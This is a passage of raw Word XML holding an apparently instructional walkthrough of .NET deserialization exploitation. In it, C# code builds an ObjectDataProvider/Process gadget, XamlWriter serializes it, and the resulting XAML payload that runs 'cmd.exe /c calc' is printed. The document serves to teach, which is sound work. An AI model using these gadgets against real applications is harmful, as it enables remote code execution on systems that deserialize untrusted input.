      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> talk at BlackHat 2017 discussing XmlSerializer in the context of the DotNetNuke vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="48EE3922" wp14:textId="4616A540">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="12E8265A" wp14:anchorId="04B18DE2">
            <wp:extent cx="5724524" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1819050862" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R86b5a7851a2c4292">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="3095625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="514C1CAB" wp14:textId="7BF57075">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The slide mentions that types with interface members can not be serialized and that this affects the Process class, which is what we were using with ObjectDataProvider in the previous exploit. However, it does also mention that we can use XamlReader.Load instead to lead to remote code execution, so let's look at this a bit closer. Essentially, XamlReader is just another serializer that can be used with .NET. We will not be able to serialize ObjectDataProvider directly with XmlSerializer to get code execution, but we can serialize a XamlReader and then pass a serialized ObjectDataProvider to XamlReader which should then result in code execution.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="01606270" wp14:textId="5419C51E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Creating our Payload</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="096207F3" wp14:textId="2A1BB42A">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's create a new .NET Framework Console application called TeeImportExploit and start working on a payload for XamlReader. Reusing our ObjectDataProvider from before, and then adding a couple of lines to serialize the object with </w:t>
      </w:r>
      <w:hyperlink r:id="Re403d42e4efa44e4">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>XamlWriter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the counterpart to XamlReader) we get this code (make sure to add the reference to System.Windows.Markup (from PresentationFramework) similar to the way we did with ObjectDataProvider):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="44CB717C" wp14:textId="7A4FDE7D">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="6711D06A" wp14:textId="538E8DC7">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using System;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>using System.Windows.Data;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>using System.Windows.Markup;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>namespace TeeImportExploit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    internal class Program</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static void Main(string[] args)</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ObjectDataProvider odp = new ObjectDataProvider();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            odp.ObjectType = typeof(System.Diagnostics.Process);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            odp.MethodParameters.Add("C:\\Windows\\System32\\cmd.exe");</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            odp.MethodParameters.Add("/c calc");</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            odp.MethodName = "Start";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            string xaml = XamlWriter.Save(odp);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            Console.WriteLine(xaml);</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="3FABFE5C" wp14:textId="081C60B6">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Running the program does launch the calculator, and an XAML string is written to the console, however, we notice that the method parameters are not mentioned anywhere, therefore, if we attempt to deserialize this string with XamlReader.Load nothing would happen.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="7F9A7D55" wp14:textId="415E97A3">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="038D6C3A" wp14:anchorId="0E84258C">
            <wp:extent cx="5724524" cy="4019550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="972637704" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3e3052fad06e4481">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="4019550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6CEA028B" wp14:textId="34B235E6">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We are not able to serialize MethodParameters, so we need to find another way to pass the parameters to Process.Start. Luckily for us, ObjectDataProvider has another field called ObjectInstance which we can set to an existing Process object. Process objects have a field called StartInfo, which is of type ProcessStartInfo. This allows us to specify the FileName and Arguments in a manner that can be serialized. So let's rewrite the code like this:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5B6985C3" wp14:textId="0ABDBB6D">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="27E67944" wp14:textId="1ADFA032">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using System;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>using System.Diagnostics;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>using System.Windows.Data;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>using System.Windows.Markup;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>namespace TeeImportExploit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    internal class Program</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static void Main(string[] args)</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ProcessStartInfo psi = new ProcessStartInfo();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            psi.FileName = "C:\\Windows\\System32\\cmd.exe";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            psi.Arguments = "/c calc";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            Process p = new Process();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            p.StartInfo = psi;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            ObjectDataProvider odp = new ObjectDataProvider();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            odp.ObjectInstance = p;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            odp.MethodName = "Start";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            string xaml = XamlWriter.Save(odp);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            Console.WriteLine(xaml);</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 xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="20F69FA2" wp14:textId="3C6E8F9B">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>This time, when we run the program the calculator will spawn again and the output will be much longer. Most importantly, the file name and arguments are included in the serialized output.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="050AB91F" wp14:textId="7A8F3758">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="0E4E84F2" wp14:anchorId="25E99BA0">
            <wp:extent cx="5724524" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="979381101" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R8d8cb1ac417b4cf3">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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="258B9915" wp14:textId="19ABB07F">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let's take a closer look at the XAML output and clean up any unnecessary information.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="123F4163" wp14:textId="5D319C0E">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: xml</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="0A129FAE" wp14:textId="3F1D189B">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&lt;ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;ObjectDataProvider.ObjectInstance&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;sd:Process&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;sd:Process.StartInfo&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;sd:ProcessStartInfo Arguments="/c calc" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="C:\Windows\System32\cmd.exe"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;sd:ProcessStartInfo.EnvironmentVariables&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
